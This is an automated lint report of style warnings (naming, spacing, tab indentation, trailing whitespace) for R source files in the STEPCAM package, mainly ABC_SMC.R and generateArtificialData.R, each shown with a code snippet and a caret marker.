^\n```\n[R/ABC_SMC.R:225:14:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L225) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:225:34:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L225) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:232:21:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L232) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:232:22:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L232) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:234:13:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L234) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:234:38:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L234) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:254:54:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L254) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:257:64:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L257) *style:* **Trailing whitespace is superfluous.**\n```r\n​    cat(\" \", mean(disp_vals), mean(filt_vals), mean(comp_vals), \n                                                               ^\n```\n[R/ABC_SMC.R:258:33:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L258) *style:* **Variable and function names should be all lowercase.**\n```r\n​        \"\\t\", \"accept rate = \", numberAccepted / (tried-1), \"\\n\")\n                                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:258:56:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L258) *style:* **Put spaces around all infix operators.**\n```r\n​        \"\\t\", \"accept rate = \", numberAccepted / (tried-1), \"\\n\")\n                                                      ~^~\n```\n[R/ABC_SMC.R:261:27:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L261) *style:* **Commas should always have a space after.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^\n```\n[R/ABC_SMC.R:261:27:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L261) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:262:20:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L262) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_disp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:263:20:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L263) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_filt <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:264:20:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L264) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_comp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:274:61:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L274) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:278:40:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L278) *style:* **Trailing whitespace is superfluous.**\n```r\n​           \"Can't stop at iteration 1 - \n                                       ^\n```\n[R/ABC_SMC.R:279:57:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L279) *style:* **Trailing whitespace is superfluous.**\n```r\n​           please set stop_at_iteration to 2 if you only \n                                                        ^\n```\n[R/generateArtificialData.R:5:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L5) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:10:23:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:12:21:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:12:47:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:12:49:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L12) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:12:64:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:50:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:13:58:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:14:37:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L14) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:14:54:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L14) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:12:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L17) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:18:22:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L18) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:14:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L20) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:20:25:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix( cbind( column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:12:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:22:19:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:22:37:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L22) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:22:40:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:17:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix( cbind( column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:25:63:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix( cbind( column1, traits_pool), ncol = (n_traits + 1))\n                                                             ~^~\n```\n[R/generateArtificialData.R:25:65:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix( cbind( column1, traits_pool), ncol = (n_traits + 1))\n                                                                ^\n```\n[R/generateArtificialData.R:26:24:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:27:31:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:29:26:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L29) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:29:43:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L29) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:29:58:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L29) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n^\n```\n[R/generateArtificialData.R:31:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L31) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                            (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:32:19:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:32:25:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                       ~^~\n```\n[R/generateArtificialData.R:32:53:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                   ~^~\n```\n[R/generateArtificialData.R:32:61:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:34:25:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n                       ~^~~\n```\n[R/generateArtificialData.R:34:34:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L34) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n                                 ^\n```\n[R/generateArtificialData.R:34:61:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n                                                           ~^~\n```\n[R/generateArtificialData.R:34:68:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L34) *style:* **Trailing whitespace is superfluous.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n                                                                   ^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities) {\n^\n```\n[R/generateArtificialData.R:35:37:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L35) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t                            (sd_richness * pool_richness) +\n                                    ^\n```\n[R/generateArtificialData.R:35:50:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\t                            (sd_richness * pool_richness) +\n                                                ~^~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == TRUE){\n^\n```\n[R/generateArtificialData.R:37:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L37) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:37:47:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:37:65:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:38:47:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L38) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  } else {\n^\n```\n[R/generateArtificialData.R:39:12:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L39) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities) {\n           ^\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:40:13:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L40) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == TRUE){\n            ^\n```\n[R/generateArtificialData.R:40:31:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L40) *style:* **Put spaces around all infix operators.**\n```r\n​\t  if(mechanism_random == TRUE){\n                             ~^~~\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:29:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for (j in 1:n_traits) {\n^\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for (k in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:24:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L44) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:44:48:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L44) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:46:17:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for (j in 1:n_traits) {\n                ^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:47:19:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L47) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for (k in 1:pool_richness) {\n                  ^\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:48:25:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:48:28:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L48) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           